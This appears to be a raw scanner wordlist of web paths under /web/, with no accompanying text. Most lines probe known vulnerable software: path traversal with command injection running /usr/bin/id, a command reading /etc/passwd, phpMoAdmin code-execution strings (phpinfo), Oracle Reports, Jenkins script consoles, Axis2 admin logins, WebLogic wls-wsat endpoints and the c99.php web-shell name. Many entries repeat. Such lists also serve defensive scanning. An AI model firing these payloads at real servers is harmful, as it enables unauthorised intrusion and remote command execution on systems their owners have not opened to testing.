/web/ans.pl?p=../../../../../usr/bin/id|&blah
/web/ans/ans.pl?p=../../../../../usr/bin/id|&blah
/web/reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF
/web/open.txt
/web/fx29id1.txt
/web/fx29id2.txt
/web/c99.php
/web/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26cat%20%22/etc/passwd%22%26
/web/script
/web/jenkins/script
/web/hudson/script
/web/axis2-admin/login
/web/axis/axis2-admin/login
/web/axis2/axis2-admin/login
/web/imcws/axis2-admin/login
/web/WebServiceImpl/axis2-admin/login
/web/dswsbobje/axis2-admin/login
/web/ws/axis2-admin/login
/web/moadmin.php
/web/phpmoadmin/moadmin.php
/web/wu-moadmin/moadmin.php
/web/moadmin/moadmin.php
/web/wu-moadmin.php
/web/phpmoadmin/wu-moadmin.php
/web/wu-moadmin/wu-moadmin.php
/web/moadmin/wu-moadmin.php
/web/moadmin.php
/web/wu-moadmin.php
/web/phpmoadmin/moadmin.php
/web/phpmoadmin/wu-moadmin.php
/web/wu-moadmin/moadmin.php
/web/wu-moadmin/wu-moadmin.php
/web/moadmin/moadmin.php
/web/moadmin/wu-moadmin.php
/web/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;
/web/phpmoadmin/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;
/web/wu-moadmin/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;
/web/moadmin/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;
/web/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;
/web/phpmoadmin/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;
/web/wu-moadmin/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;
/web/moadmin/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;
/web/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;
/web/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;
/web/phpmoadmin/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;
/web/phpmoadmin/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;
/web/wu-moadmin/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;
/web/wu-moadmin/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;
/web/moadmin/moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;
/web/moadmin/wu-moadmin.php?collection=secpulse&action=listRows&find=array();phpinfo();exit;
/web/tws/getStatus
/web/wls-wsat/CoordinatorPortType
/web/wls-wsat/RegistrationPortTypeRPC
/web/wls-wsat/ParticipantPortType
/web/wls-wsat/RegistrationRequesterPortType
/web/wls-wsat/CoordinatorPortType11
/web/wls-wsat/RegistrationPortTypeRPC11
/web/wls-wsat/ParticipantPortType11
